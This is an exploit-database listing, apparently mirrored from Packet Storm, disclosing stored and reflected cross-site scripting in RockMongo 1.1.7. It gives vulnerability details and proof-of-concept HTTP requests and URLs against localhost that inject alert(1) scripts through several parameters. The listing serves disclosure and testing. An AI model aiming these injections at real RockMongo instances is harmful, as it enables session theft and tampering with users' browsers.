Exploit for RockMongo 1.1.7 Cross Site Scripting

Name: Exploit for RockMongo 1.1.7 Cross Site Scripting
Rating: 5 (184 reviews)
2023-05-15 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:172322
# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2020-09-19  
# Vendor Homepage: https://github.com/iwind/rockmongo/  
# Software Link : https://github.com/iwind/rockmongo/  
# Tested Version: 1.1.7  
# Tested on: Windows 7 and 10  
  
# Vulnerability Type: Stored Cross-Site Scripting (XSS)  
  
CVSS v3: 6.5  
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N  
CWE: CWE-79  
  
Vulnerability description: RockMongo v1.1.7, does not sufficiently encode  
user-controlled inputs, resulting in a stored and reflected Cross-Site  
Scripting (XSS) vulnerability via the index.php, in multiple parameter.  
  
Proof of concept:  
  
Stored:  
  
POST https://localhost/mongo/index.php?action=db.newCollection&db=local  
HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 69  
Origin: https://localhost  
Connection: keep-alive  
Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local  
Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;  
rock_format=json  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0  
  
Reflected:  
  
https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log  
  
https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E  
  
https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E  
  
http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll  
  
http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll  
  
http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll  
  
  
POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Origin: https://localhost  
Authorization: Basic cm9vdDpyb290  
Connection: keep-alive  
Referer: https://localhost/mongo/index.php?action=login.index&host=0  
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;  
rock_format=json  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3  
  
POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Origin: https://localhost  
Authorization: Basic cm9vdDpyb290  
Connection: keep-alive  
Referer: https://localhost/mongo/index.php?action=server.command&  
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;  
rock_format=json  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json  
  
POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 140  
Origin: https://localhost  
Authorization: Basic cm9vdDpyb290  
Connection: keep-alive  
Referer: https://localhost/mongo/index.php?action=server.execute&  
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;  
rock_format=json  
Upgrade-Insecure-Requests: 1  
Host: localhost  
  
code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E